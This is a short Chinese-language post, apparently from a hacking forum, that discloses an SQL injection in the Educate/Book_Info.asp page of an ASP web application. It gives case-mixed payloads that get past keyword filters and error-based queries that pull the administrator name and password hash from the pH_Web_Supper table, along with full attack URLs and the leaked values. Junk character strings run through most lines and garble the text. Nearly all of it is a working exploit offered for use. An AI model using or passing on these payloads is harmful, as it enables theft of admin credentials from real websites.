漏洞出现在Educate/Book_Info.asp
4 q! F. }5 u6 G* p( \
8 j4 G' i9 g+ H" Y9 K此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出$ x E& Q5 v* b
7 D! C! U) v3 y# b: ^- T1 w8 ^
exp:如下+ p4 j2 |7 k% c4 Y' A! O/ e9 g
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)0 s( h/ @2 O0 K
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)# _% ], c( H: e$ p/ u- u
1 O/ ?9 y- a+ b+ y l- bhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
# u. o3 H, f+ h8 ]& H% s4 Q: V 0 X1 V. I$ s( y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
8 ~5 K' Y( k1 U! H& s- Q0 B& [ l+ E% [ Y3 w* `" | s( m+ Q
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。8 d/ T- d% x* Z4 y% N, N$ q6 {" ~5 M
2 L! x+ j- b0 l0 r1 i) B) p
/Educate/Book_Info.asp,行 8 o* _/ s: I9 w6 \+ l
+ q4 K% m. w6 l3 K. c
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 ?( a: b# G( |- T
3 {" L, G; Z/ X0 v7 w: JMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
! T! E" ~; b/ T; X) B' C! U- M2 R ' e% [. j8 Z* E; T
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。9 L: r6 t8 e9 ?. @, v- a6 I
, n0 A! `2 P0 I/ g- M o1 o) \/Educate/Book_Info.asp,行 8 I3 y1 g# W3 Y9 B% Y7 W
|